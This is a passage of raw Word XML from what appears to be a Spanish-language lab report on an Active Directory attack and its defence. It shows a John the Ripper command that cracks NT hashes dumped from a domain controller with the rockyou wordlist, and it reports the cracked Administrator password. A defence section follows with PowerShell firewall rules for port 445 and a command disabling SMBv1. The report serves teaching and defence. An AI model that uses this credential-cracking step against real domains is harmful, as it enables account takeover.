            <wp:docPr id="445264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4953" name="Imagen 1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId147"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2719705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F88A154" w14:textId="77777777" w:rsidR="00C76E97" w:rsidRDefault="00C76E97" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B267AD8" w14:textId="77777777" w:rsidR="00C76E97" w:rsidRDefault="00C76E97" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="325410E5" w14:textId="3968181B" w:rsidR="00C76E97" w:rsidRDefault="00C76E97" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69719A46" wp14:editId="3EED5511">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="795979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79783" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId148"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43BFB7AD" w14:textId="77777777" w:rsidR="00C76E97" w:rsidRDefault="00C76E97" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDAFC3E" w14:textId="680957E4" w:rsidR="00C76E97" w:rsidRDefault="00C76E97" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00C76E97">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="497DC295" wp14:editId="0ECC6034">
            <wp:extent cx="5400040" cy="2717165"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="2139907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7642" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId149" cstate="screen">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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFFC35C" w14:textId="77777777" w:rsidR="00BE7E3F" w:rsidRDefault="00BE7E3F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4A3330" w14:textId="588B2138" w:rsidR="00BE7E3F" w:rsidRDefault="00BE7E3F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE7E3F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C865315" wp14:editId="51D0318A">
            <wp:extent cx="5400040" cy="2718435"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="569680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80562" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId150" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2718435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FA01A0" w14:textId="77777777" w:rsidR="00BE7E3F" w:rsidRDefault="00BE7E3F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="317613B0" w14:textId="2E0FCD3F" w:rsidR="00BE7E3F" w:rsidRDefault="00BE7E3F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Usando Jhon descifraré </w:t>
      </w:r>
      <w:r w:rsidR="00241973">
        <w:t xml:space="preserve">la contraseña </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del </w:t>
      </w:r>
      <w:r w:rsidR="00241973">
        <w:t>Administrador</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> del dominio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AEAB6C" w14:textId="05C63A7A" w:rsidR="00BE7E3F" w:rsidRDefault="00BE7E3F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20BDFFB6" wp14:editId="5144F2BA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="49525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60F8DD13" w14:textId="5B0364A3" w:rsidR="00BE7E3F" w:rsidRDefault="00BE7E3F">
                            <w:r w:rsidRPr="00BE7E3F">
                              <w:t>sudo john --wordlist=/usr/share/wordlists/rockyou.txt  DC02.secretsdump.ntds --format=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BDFFB6" id="_x0000_s1043" type="#_x0000_t202" style="position:absolute;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&#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NIdjXO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60F8DD13" w14:textId="5B0364A3" w:rsidR="00BE7E3F" w:rsidRDefault="00BE7E3F">
                      <w:r w:rsidRPr="00BE7E3F">
                        <w:t>sudo john --wordlist=/usr/share/wordlists/rockyou.txt  DC02.secretsdump.ntds --format=NT</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="20021204" w14:textId="77777777" w:rsidR="00C76E97" w:rsidRDefault="00C76E97" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0458DF09" w14:textId="77777777" w:rsidR="00C76E97" w:rsidRDefault="00C76E97" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726F2601" w14:textId="77777777" w:rsidR="009916DA" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230BA56E" w14:textId="77777777" w:rsidR="009916DA" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04843963" w14:textId="77777777" w:rsidR="009916DA" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3907417E" w14:textId="77777777" w:rsidR="009916DA" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D66E1D6" w14:textId="77777777" w:rsidR="009916DA" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D6275A2" w14:textId="4D041A13" w:rsidR="00BE7E3F" w:rsidRDefault="00BE7E3F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE7E3F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60F1C43F" wp14:editId="14BC054F">
            <wp:extent cx="5400040" cy="2717165"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1938842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2685" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId151" cstate="screen">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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6EA2B9" w14:textId="77777777" w:rsidR="00F51705" w:rsidRDefault="00F51705" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ACCD7BB" w14:textId="19B610A0" w:rsidR="00F51705" w:rsidRDefault="009B5329" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Siendo ‘abc123.’ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E351A7F" w14:textId="77777777" w:rsidR="007E3647" w:rsidRDefault="007E3647" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D4841CE" w14:textId="77777777" w:rsidR="00E711D2" w:rsidRDefault="00E711D2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C41BE1D" w14:textId="77777777" w:rsidR="00E711D2" w:rsidRDefault="00E711D2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E33ACCA" w14:textId="29465609" w:rsidR="00E711D2" w:rsidRDefault="00A71BD1" w:rsidP="00011262">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc135575987"/>
      <w:r>
        <w:t>Defensa -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="4112C970" w14:textId="77777777" w:rsidR="00E711D2" w:rsidRDefault="00E711D2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A407EC1" w14:textId="6C438432" w:rsidR="00E711D2" w:rsidRDefault="00A71BD1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para la defendernos de la vulnerabilidad en el protocolo MS-DFSNM, no hay una solución concreta a este problema, por lo menos sin actualizar el equipo, siendo este problema solucionado por un parche de Microsoft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F89AAFC" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B7669DC" w14:textId="4B92A602" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Lo que voy a hacer es aplicar una regla en el firewall para bloquear el puerto 445 TCP que utiliza el servicio DFS mediante un script de PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573430DD" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A2FEFC" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1CFBE4" w14:textId="2CDA7F3B" w:rsidR="00A71BD1" w:rsidRPr="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A71BD1">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>1. `New-NetFirewallRule -DisplayName "Bloquear puerto TCP 445" -Direction Outbound -LocalPort 445 -Protocol TCP -Action Block -Profile P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>rivate</w:t>
      </w:r>
      <w:r w:rsidRPr="00A71BD1">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8147F" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E372E98" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Esta regla de firewall bloquea todo el tráfico saliente en el puerto TCP 445 en la red pública. A continuación se explica cada uno de los parámetros utilizados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66034AC4" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27584155" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- `-DisplayName`: Este parámetro especifica el nombre que se le dará a la regla de firewall. En este caso, se utiliza el nombre "Bloquear puerto TCP 445".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF2494" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48BB45A4" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- `-Direction`: Este parámetro especifica la dirección del tráfico que se va a bloquear. En este caso, se utiliza el valor "Outbound" para bloquear el tráfico que sale de la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B726E" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C11B53C" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- `-LocalPort`: Este parámetro especifica el número del puerto que se va a bloquear. En este caso, se utiliza el número de puerto 445, que es el puerto predeterminado que utiliza DFS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E629F61" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18892B40" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- `-Protocol`: Este parámetro especifica el protocolo de red que se va a bloquear. En este caso, se utiliza el valor "TCP" para bloquear el tráfico que utiliza el protocolo TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614CF603" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6086C108" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- `-Action`: Este parámetro especifica la acción que se va a tomar con el tráfico bloqueado. En este caso, se utiliza el valor "Block" para bloquear el tráfico saliente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA837FC" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C787D7C" w14:textId="632FF94C" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- `-Profile`: Este parámetro especifica el perfil de red en el que se va a aplicar la regla de firewall. En este caso, se utiliza el valor "Private" para bloquear el tráfico en la red privada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4572EE11" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6523CADB" w14:textId="003B21BD" w:rsidR="00A71BD1" w:rsidRPr="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A71BD1">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>2. `New-NetFirewallRule -DisplayName "Bloquear puerto TCP 445" -Direction Inbound -LocalPort 445 -Protocol TCP -Action Block -Profile Private`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292A14BE" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6A870D" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Esta regla de firewall bloquea todo el tráfico entrante en el puerto TCP 445 en la red pública. Los parámetros utilizados son los mismos que en la regla anterior, con la excepción del parámetro "-Direction", que se utiliza el valor "Inbound" para bloquear el tráfico que entra en la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CBE93E" w14:textId="77777777" w:rsidR="00A71BD1" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BD7060" w14:textId="057F7862" w:rsidR="00E711D2" w:rsidRDefault="00A71BD1" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>En resumen, estas reglas de firewall bloquean todo el tráfico que utiliza el puerto TCP 445 en la red privada, tanto entrante como saliente, utilizando el protocolo TCP y la acción "Block" para evitar que se realicen conexiones al servicio DFS desde el exterior de la red. Es importante tener en cuenta que estas reglas pueden afectar el funcionamiento de otros servicios y aplicaciones que utilizan este puerto, por lo que se recomienda realizar pruebas exhaustivas antes de implementarlas en un entorno de producción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1BFBD" w14:textId="77777777" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F918853" w14:textId="693D3E56" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Lo siguiente que vamos hacer es desactivar el protocolo SMBV1 de la red ya que esta vulnerabilidad funciona con este protocolo, tendríamos que activar SMBv2 oSMBv3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C33DBF" w14:textId="77777777" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D4CCB5" w14:textId="6D41170E" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>En este caso vamos activar el dos y desactivar el uno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D926B7" w14:textId="77777777" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9E5C30" w14:textId="77CAA1A0" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para deshabilitar SMBv1, en PowerShell escribiremos el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE17FF4" w14:textId="37B3E9A0" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251756544" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C1671D9" wp14:editId="541A59B0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="15555730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0EE8FE77" w14:textId="7E47558F" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E">
                            <w:r w:rsidRPr="00B36C2E">
                              <w:t>Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protoc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1671D9" id="_x0000_s1044" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517565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&#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Lu3pgO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0EE8FE77" w14:textId="7E47558F" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E">
                      <w:r w:rsidRPr="00B36C2E">
                        <w:t>Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5C054F" w14:textId="77777777" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1E864E" w14:textId="77777777" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A541694" w14:textId="77777777" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C956499" w14:textId="79F2E9C3" w:rsidR="00B36C2E" w:rsidRDefault="00B36C2E" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Esto lo vamos hacer en DC01 con IP 192.168.1.79:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C39EAEB" w14:textId="77777777" w:rsidR="007A5804" w:rsidRDefault="007A5804" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CAF27F6" w14:textId="1F9CAAE7" w:rsidR="00B36C2E" w:rsidRDefault="007A5804" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Primero comprobamos si esta activado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6453C1D0" w14:textId="77777777" w:rsidR="007A5804" w:rsidRDefault="007A5804" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FCDDE53" w14:textId="2AF52FCC" w:rsidR="007A5804" w:rsidRDefault="007A5804" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B376E3E" wp14:editId="1E136A01">
            <wp:extent cx="6645910" cy="2583180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="42750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0362"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2583180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0324FA" w14:textId="77777777" w:rsidR="007A5804" w:rsidRDefault="007A5804" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="552040FB" w14:textId="5673EE98" w:rsidR="007A5804" w:rsidRDefault="007A5804" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Lo desactivamos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F5551A" w14:textId="77777777" w:rsidR="007A5804" w:rsidRDefault="007A5804" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792AD227" w14:textId="24DD3213" w:rsidR="007A5804" w:rsidRDefault="007A5804" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54D6CA02" wp14:editId="1A30D76F">
            <wp:extent cx="6645910" cy="1470660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="190819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92543"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470660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFA453D" w14:textId="564D33F3" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
